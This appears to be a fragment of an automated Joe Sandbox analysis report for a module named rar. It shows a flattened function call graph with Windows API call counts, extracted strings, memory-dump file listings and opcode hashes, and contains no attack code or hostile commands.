7ff6d7ed3eab 39704->39699 39708 7ff6d7ed63e8 8 API calls 2 library calls 39704->39708 39706->39697 39707->39704 39708->39699 39709 7ff6d7ed7a5b 39710 7ff6d7ed7a60 39709->39710 39711 7ff6d7ee9be0 14 API calls 39710->39711 39713 7ff6d7ed7af7 39710->39713 39711->39713 39712 7ff6d7ed7bda 39715 7ff6d7edb540 147 API calls 39712->39715 39713->39712 39742 7ff6d7ef1e1c GetFileTime 39713->39742 39716 7ff6d7ed7bf8 39715->39716 39719 7ff6d7ed7c3e 39716->39719 39743 7ff6d7f29b98 216 API calls 3 library calls 39716->39743 39718 7ff6d7edb540 147 API calls 39721 7ff6d7ed7c9c 39718->39721 39719->39718 39720 7ff6d7ed7f89 39721->39720 39744 7ff6d7ef6378 39721->39744 39723 7ff6d7ed7cd7 39724 7ff6d7ef6378 4 API calls 39723->39724 39726 7ff6d7ed7cf3 39724->39726 39725 7ff6d7ed7de1 39732 7ff6d7ed7e4e 39725->39732 39749 7ff6d7f098dc 39725->39749 39726->39725 39728 7ff6d7ed7d38 39726->39728 39729 7ff6d7ed7d59 39726->39729 39730 7ff6d7f2a444 new 4 API calls 39728->39730 39731 7ff6d7f2a444 new 4 API calls 39729->39731 39736 7ff6d7ed7d42 std::bad_alloc::bad_alloc 39730->39736 39731->39736 39755 7ff6d7ed1204 48 API calls 39732->39755 39734 7ff6d7ed7eb3 39737 7ff6d7ed7edb 39734->39737 39756 7ff6d7f09680 39734->39756 39736->39725 39748 7ff6d7f2ba34 RtlPcToFileHeader RaiseException 39736->39748 39762 7ff6d7ef6424 8 API calls _UnwindNestedFrames 39737->39762 39739 7ff6d7ed7f56 39741 7ff6d7edb540 147 API calls 39739->39741 39741->39720 39742->39712 39743->39719 39745 7ff6d7ef6396 39744->39745 39747 7ff6d7ef63a0 39744->39747 39746 7ff6d7f2a444 new 4 API calls 39745->39746 39746->39747 39747->39723 39748->39725 39750 7ff6d7f09926 39749->39750 39751 7ff6d7f0993c 39749->39751 39752 7ff6d7ee90b8 75 API calls 39750->39752 39753 7ff6d7ee90b8 75 API calls 39751->39753 39754 7ff6d7f09934 39752->39754 39753->39754 39754->39732 39755->39734 39757 7ff6d7f096a4 39756->39757 39758 7ff6d7f097d7 39757->39758 39759 7ff6d7ef2574 126 API calls 39757->39759 39761 7ff6d7f29b98 216 API calls 39757->39761 39763 7ff6d7ef6498 72 API calls new 39757->39763 39759->39757 39761->39757 39762->39739 39763->39757 39764 7ff6d7f1bb70 39767 7ff6d7f1bb80 39764->39767 39776 7ff6d7f1bae8 39767->39776 39769 7ff6d7f1bb79 39770 7ff6d7f1bb97 39770->39769 39781 7ff6d7ee1690 39770->39781 39772 7ff6d7f1bbc8 SetEvent 39773 7ff6d7f1bbd5 LeaveCriticalSection 39772->39773 39774 7ff6d7f1bae8 67 API calls 39773->39774 39774->39770 39785 7ff6d7f1b974 WaitForSingleObject 39776->39785 39779 7ff6d7f1bb16 EnterCriticalSection LeaveCriticalSection 39780 7ff6d7f1bb12 39779->39780 39780->39770 39782 7ff6d7ee16c2 EnterCriticalSection 39781->39782 39783 7ff6d7ee16a4 39781->39783 39782->39772 39782->39773 39783->39782 39793 7ff6d7ee1180 39783->39793 39786 7ff6d7f1b9b7 39785->39786 39787 7ff6d7f1b986 GetLastError 39785->39787 39786->39779 39786->39780 39791 7ff6d7eeca6c 48 API calls 3 library calls 39787->39791 39789 7ff6d7f1b9a6 39792 7ff6d7eeca40 61 API calls _CxxThrowException 39789->39792 39791->39789 39792->39786 39794 7ff6d7ee11ab 39793->39794 39802 7ff6d7ee11b0 39793->39802 39803 7ff6d7ee17c8 216 API calls 2 library calls 39794->39803 39796 7ff6d7ee166a 39796->39783 39797 7ff6d7f06e90 216 API calls 39797->39802 39798 7ff6d7f06d38 216 API calls 39798->39802 39799 7ff6d7f06fe8 216 API calls 39799->39802 39800 7ff6d7ee1080 48 API calls 39800->39802 39802->39796 39802->39797 39802->39798 39802->39799 39802->39800 39804 7ff6d7ee17c8 216 API calls 2 library calls 39802->39804 39803->39802 39804->39802 39805 7ff6d7f39c74 39806 7ff6d7f39c7c 39805->39806 39807 7ff6d7f39cbb 39806->39807 39808 7ff6d7f39cac 39806->39808 39809 7ff6d7f39cc5 39807->39809 39827 7ff6d7f3ce08 32 API calls 2 library calls 39807->39827 39826 7ff6d7f34f3c 15 API calls abort 39808->39826 39814 7ff6d7f34b8c 39809->39814 39813 7ff6d7f39cb1 __scrt_fastfail 39815 7ff6d7f34bab 39814->39815 39816 7ff6d7f34ba1 39814->39816 39818 7ff6d7f34bb0 39815->39818 39824 7ff6d7f34bb7 __vcrt_getptd_noexit 39815->39824 39817 7ff6d7f34ab4 setbuf 16 API calls 39816->39817 39822 7ff6d7f34ba9 39817->39822 39819 7ff6d7f34a74 __vcrt_freefls 15 API calls 39818->39819 39819->39822 39820 7ff6d7f34bf6 39828 7ff6d7f34f3c 15 API calls abort 39820->39828 39822->39813 39823 7ff6d7f34be0 RtlReAllocateHeap 39823->39822 39823->39824 39824->39820 39824->39823 39825 7ff6d7f336c0 new 2 API calls 39824->39825 39825->39824 39826->39813 39827->39809 39828->39822 39829 7ff6d7f1a924 39831 7ff6d7f1a949 sprintf 39829->39831 39830 7ff6d7f1a97f CompareStringA 39831->39830
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000053.00000002.2145809940.00007FF6D7ED1000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF6D7ED0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2145768157.00007FF6D7ED0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2145961692.00007FF6D7F40000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2145997517.00007FF6D7F58000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2146031386.00007FF6D7F59000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2146066073.00007FF6D7F5A000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2146066073.00007FF6D7F64000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2146066073.00007FF6D7F6E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2146066073.00007FF6D7F76000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2146235048.00007FF6D7F78000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2146294833.00007FF6D7F7E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_83_2_7ff6d7ed0000_rar.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
                                                                                                                                                                                                                                                                                                                        • API String ID: 0-1660254149
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 5d91ed339d1634cb5a2c702478601efa01ca129259e3f82cdc22d41a5736d98b
                                                                                                                                                                                                                                                                                                                        • Instruction ID: daa78cdb95759bb4ef66fe95222caa2d909430007b371a9fcb77b863f0423a25
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d91ed339d1634cb5a2c702478601efa01ca129259e3f82cdc22d41a5736d98b
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 26E2BE26A08AC289EB20DF25D8402FD27A6FBC5788F454037DA5D8BB96DF3DD564C306
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000053.00000002.2145809940.00007FF6D7ED1000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF6D7ED0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2145768157.00007FF6D7ED0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2145961692.00007FF6D7F40000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2145997517.00007FF6D7F58000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2146031386.00007FF6D7F59000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2146066073.00007FF6D7F5A000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2146066073.00007FF6D7F64000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2146066073.00007FF6D7F6E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2146066073.00007FF6D7F76000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2146235048.00007FF6D7F78000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2146294833.00007FF6D7F7E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_83_2_7ff6d7ed0000_rar.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Threadwcschr$CreateExceptionPriorityThrow
                                                                                                                                                                                                                                                                                                                        • String ID: CreateThread failed
                                                                                                                                                                                                                                                                                                                        • API String ID: 1217111108-3849766595
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                                                                                                                                                                        • Instruction ID: a57cf869c55bacff544c3456d4648233060c61e996174434469912003c55a234
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 85115132A08A42D2E725DB24E8411BD7370FB84B98F944533DA9D83669DF3CE666C741
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000053.00000002.2145809940.00007FF6D7ED1000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF6D7ED0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2145768157.00007FF6D7ED0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2145961692.00007FF6D7F40000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2145997517.00007FF6D7F58000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2146031386.00007FF6D7F59000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2146066073.00007FF6D7F5A000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2146066073.00007FF6D7F64000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2146066073.00007FF6D7F6E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2146066073.00007FF6D7F76000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2146235048.00007FF6D7F78000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2146294833.00007FF6D7F7E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_83_2_7ff6d7ed0000_rar.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                                                                                                                                                                        • Instruction ID: be01d8f0f76930eb71a84b43eb64ac89f440c7749710fc0ee8f0a406c460134c
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D0E04652F1930281ED782763285127D02802F6AB80F5464BECD1FC7382ED2EA4B92603
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000053.00000002.2145809940.00007FF6D7ED1000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF6D7ED0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2145768157.00007FF6D7ED0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2145961692.00007FF6D7F40000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2145997517.00007FF6D7F58000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2146031386.00007FF6D7F59000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2146066073.00007FF6D7F5A000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2146066073.00007FF6D7F64000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2146066073.00007FF6D7F6E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2146066073.00007FF6D7F76000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2146235048.00007FF6D7F78000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000053.00000002.2146294833.00007FF6D7F7E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_83_2_7ff6d7ed0000_rar.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                                                                                                                                                                                                                                                                                        • Instruction ID: ac782fbfd6585e38f34c3e210c10df7d1b7ac33a9d792d58a021fc74007e294c
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C0F0AF22A0864A45FB348B69E44037CA661DB10BB8F985332D63DC64D8CF7CD9A2C792